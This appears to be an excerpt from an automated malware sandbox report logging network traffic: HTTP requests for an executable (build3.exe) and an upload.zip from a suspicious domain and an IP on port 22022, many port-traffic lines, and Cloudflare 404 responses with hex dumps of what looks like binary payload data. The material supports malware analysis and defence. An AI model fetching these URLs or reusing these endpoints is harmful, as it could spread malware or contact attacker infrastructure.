Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /153ce668f1e21829c936c2b11fa4d869 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022
Source: global traffic	HTTP traffic detected: GET /upload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD91D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.124 Safari/537.36Host: 5.75.213.102:22022Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a6HZq4MSjdPkCQUSE82xY%2B%2BHNvD3CYSoJkCvrm8V%2BbdHOikFX5EIagOesgT1%2F6T3OnLDLj1vgwiQ2H5%2BQpQwICSaH%2BUUQqv0Xixzs477311UMWSEp8zQZ7JDjqVIeMfF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d02a5a7c9b71-FRAalt-svc: h3=":443"; ma=86400Data Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e2 0d 0a Data Ascii: 8=Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZM00uq7h92rVfqFEFkpu0Rkot%2BKly2NEmJl8sQfR%2Bdki8VjUgwbFd%2BHTf3N4%2FgncI6BrMV4K7pzD5YThY1TQjRvEMmkEeC%2FZYyk3HKmJQKrTzu9zfE%2BxURd3jXOzA2N9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d02b4b1f9b71-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oMu%2FSmzmhqbuLLmBCSOhlEQucBge1QVlARFBxDjh132KV8Dzvq%2BBag%2BeSzmKAJt73suEQLyShiQIHEaD%2BXconwqq9GSKEXsHyTMv%2FHiNo1JmK743iU9kRbwpm2PvJnQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0417e31927f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=50PScmPTNgOqi29c44GJ6imFx36iwckOowmvNDNb8hNozLTBOZc5hwXQG0MuqDRq139yyq5rCV4358nNwOXWF6SvwgP73dmbq48umPPgcI3drUhn72S0s%2Br8VW%2Bq802d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d042bf03927f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G8piPF9V3LN0VTsrKge8uR7gX1i8rcmpInmjaB9LRgfQ5Zc8QY6IPsQSsA%2FIRXPrSiZT9riquJGUTkpC8MzjhE2PJKBmFQjNmyIEVqxtMvxPLDpHWrf%2BXRF7WBZrIlpi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d053cac83671-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ePoYtFTcHq4ELtPgiY2fx9dfc2lgwQXAKL1aCFGzmem1ZkQcV4Jv0NTkL893F05vOxVodtE29xkG0UUzjyNWoJa31gS8fkDm1YufIeysnRZARpYvTHDX4mPkzgx%2B4Eoi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d054bb5d3671-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3d 44 55 3b be 63 1c 61 0d 0a Data Ascii: 26Uys/~(`:I_Ny=DU;ca
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1V%2BruYI0uHpEZlNitIAJ95mVfuSmAHOfFbK%2BKhq%2FfEwDd402%2BtHaQ5H3VGnhc2L6uErrI590Kcf6xESmfAHNLqFmts44wm8QFlncXBtRis0kh7yH0mARo0dNUzz1Qr%2FG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d05d3871929f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 02 c5 5b c0 ff 01 b1 2c e2 23 41 5c 39 f3 7f 4a 67 83 55 66 1f 74 c1 e2 8d b2 d1 21 dc 28 3a 50 20 0d 0a Data Ascii: 36Uys/~(u:R[,#A\9JgUft!(:P
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cUhOM5YYTcKzy8U0M0NGej8NXBdDPBUDrc80mPtuVhHLEllewaW9NcOL8jiLna7ELPVC0mWuwNtfTK7AhLttdFAsmMj7TS%2F%2BI90QguEKCp68nNxXYm%2Bo%2BNhUZJTh%2Bjmt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d06a9d505ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pDLIlNPsDRFN1kl3rRjBenzhUYYha7BXmx%2BW7WYk7xRWtyvsKVKVMFm7xdedJw5rGlm9xrpVCJ1GJnZgseLGSSGguXeB%2FiRypbiQ3bvKgnkqOtN%2FL8wRaTIW29FyV0f7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d06bde0d5ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 35 62 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 dd 73 d4 74 c4 ec c2 1d 68 bc 39 d1 b4 2f e5 12 2f bd 46 33 4c 11 08 1b bc 09 dd 90 a5 df e3 d2 8d d2 20 a4 71 f7 87 a5 e8 c6 15 dd 1b dd 81 1f 4a ca 68 9e db 8e ed c9 76 3d 30 3c 95 56 0b a2 4d e6 17 47 8e 1e 9d b4 38 2b 15 ba be bd c9 31 bf 6c 13 d9 55 ca 88 ab 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 06 d0 25 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e ad fe ff 78 35 05 db c4 0d 13 13 3b 45 e1 92 24 18 4f c5 03 a1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca af 96 be 21 51 61 22 a9 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5f 11 ed 0e c0 eb 7e 71 eb f0 ad 1a b0 9a 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 70 b9 a6 e5 cc 23 b2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb fb cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d cb 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 17 8d d6 8e 82 11 e8 e4 1f b6 a8 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 b0 79 cb 1f d4 5c 62 91 9c 17 06 f1 2c b2 a7 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 b8 89 8b e1 12 22 d7 9c 8a c1 e0 2b 83 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c e1 6f f5 52 48 44 60 96 4d 9b e7 17 3f f0 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 Data Ascii: 15bf`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGsth9//F3L qJhv=0<VMG8+1lU3Ob>!ZC:>%wSSP{~x5;E$O
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DrisWGP1IptMH%2FooRo1boZBN7QBLKV5RK3rmGKxyd9egu8AzVntw97o9XY7oZN7PCbuQYYuQ4gCLYsb3UjGRNB4%2FT5PgBi0MeLyQlKzUwRYh0HtFO07qrDIGB%2FGLAAt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d07018815ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UEfWtRCWjtMrsr80I24CkaQlwLVfF9fefQYWo5ww1Zhut9qN3%2F%2Ftno1tYPLCsXwOui3vHZnypQ3m1tR7mGgnckiQP7mqIEtPFPCr%2BuXksGySOtvzeDrMAlDC6fDDxS7K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d07098cb5ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 63 37 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 dd 73 d4 74 c4 ec c2 1d 68 bc 39 d1 b4 2f e5 12 2f bd 46 33 4c 11 08 1b bc 09 dd 90 a5 df e3 d2 8d d2 20 a4 71 f7 87 a5 e8 c6 15 dd 1b dd 81 1f 4a ca 68 9e db 8e ed c9 76 3d 30 3c 95 56 0b a2 4d e6 17 47 8e 1e 9d b4 38 2b 15 ba be bd c9 31 bf 6c 13 d9 55 ca 88 ab 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 06 d0 25 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e ad fe ff 78 35 05 db c4 0d 13 13 3b 45 e1 92 24 18 4f c5 03 a1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca af 96 be 21 51 61 22 a9 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5f 11 ed 0e c0 eb 7e 71 eb f0 ad 1a b0 9a 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 70 b9 a6 e5 cc 23 b2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb fb cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d cb 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 17 8d d6 8e 82 11 e8 e4 1f b6 a8 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 b0 79 cb 1f d4 5c 62 91 9c 17 06 f1 2c b2 a7 03 